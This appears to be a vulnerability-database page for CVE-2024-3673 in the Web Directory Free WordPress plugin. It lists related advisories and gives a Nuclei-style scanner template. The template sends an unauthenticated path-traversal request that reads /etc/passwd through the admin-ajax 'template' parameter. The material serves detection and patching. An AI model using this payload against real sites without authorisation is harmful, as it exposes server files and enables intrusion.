| Title | Published | Views | Family |
|---|---|---|---|
| Exploit for CVE-2024-3673 | 24 Jan 2025 21:50 | – | githubexploit |
| The vulnerability of the `include` function in the Web Directory Free plugin of the WordPress content management system arises from an incorrect limitation on the path to the restricted directory. This allows attackers to execute arbitrary code. | 26 Mar 2025 00:00 | – | bdu_fstec |
| CVE-2024-3673 | 30 Aug 2024 08:57 | – | circl |
| WordPress plugin Web Directory Free security vulnerability | 30 Aug 2024 00:00 | – | cnnvd |
| CVE-2024-3673 | 30 Aug 2024 06:00 | – | cve |
| CVE-2024-3673 Web Directory Free < 1.7.3 - Unauthenticated LFI | 30 Aug 2024 06:00 | – | cvelist |
| CVE-2024-3673 | 30 Aug 2024 06:15 | – | nvd |
| CVE-2024-3673 | 30 Aug 2024 06:15 | – | osv |
| WordPress Web Directory Free plugin < 1.7.3 - Unauthenticated LFI vulnerability | 30 Aug 2024 06:49 | – | patchstack |
| WordPress Web Directory Free Plugin < 1.7.3 is vulnerable to Local File Inclusion | 30 Aug 2024 00:00 | – | patchstack |
```yaml
id: CVE-2024-3673

info:
  name: Web Directory Free < 1.7.3 - Local File Inclusion
  author: s4e-io
  severity: critical
  description: |
    The Web Directory Free WordPress plugin before 1.7.3 does not validate a parameter before using it in an include(), which could lead to Local File Inclusion issues.
  impact: |
    Unauthenticated attackers can exploit LFI to read sensitive files including /etc/passwd via the template parameter.
  remediation: |
    Update Web Directory Free to version 1.7.3 or later.
  reference:
    - https://wpscan.com/vulnerability/0e8930cb-e176-4406-a43f-a6032471debf/
    - https://nvd.nist.gov/vuln/detail/CVE-2024-3673
    - https://vuldb.com/?id.276216
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H
    cvss-score: 9.1
    cve-id: CVE-2024-3673
    epss-score: 0.05578
    epss-percentile: 0.91929
  metadata:
    verified: true
    max-request: 2
    vendor: salephpscripts
    product: web-directory-free
    publicwww-query: "/wp-content/plugins/web-directory-free"
  tags: cve,cve2024,wordpress,wp-plugin,wp,lfi,web-directory-free,vuln

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'contains(body, "/wp-content/plugins/web-directory-free")'
          - 'status_code == 200'
        condition: and
        internal: true

  - raw:
      - |
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        from_set_ajax=1&action=w2dc_controller_request&template=../../../../../etc/passwd

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"

      - type: word
        part: content_type
        words:
          - 'text/html'

      - type: status
        status:
          - 200
# digest: 490a0046304402205eea027e8fbdf502890399ee273dcb81d06f657450435531e53ba3905cb3a52902206a8321cedb1393d9fb50a9280b65347c354a85d93f3b690d65db75e79c2a2a85:922c64590222798bb761d5b6d8e72950
```